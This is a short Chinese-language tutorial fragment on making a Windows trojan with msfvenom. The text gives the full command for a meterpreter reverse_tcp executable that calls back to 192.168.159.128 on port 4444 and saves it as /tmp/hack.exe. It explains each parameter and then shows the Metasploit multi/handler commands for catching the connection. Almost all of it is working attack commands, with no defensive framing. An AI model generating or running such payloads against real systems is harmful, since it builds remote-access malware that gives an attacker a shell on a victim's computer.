一、生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4444 -f exe -o /tmp/hack.exe
这里我们为生成的木马指定了payload为:
windows/meterpreter/reverse_tcp
,反弹到的监听端地址为192.168.159.128,监听端口为4444,文件输出格式为exe并保存到路径/tmp/hack.exe
二、执行监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.159.128
show options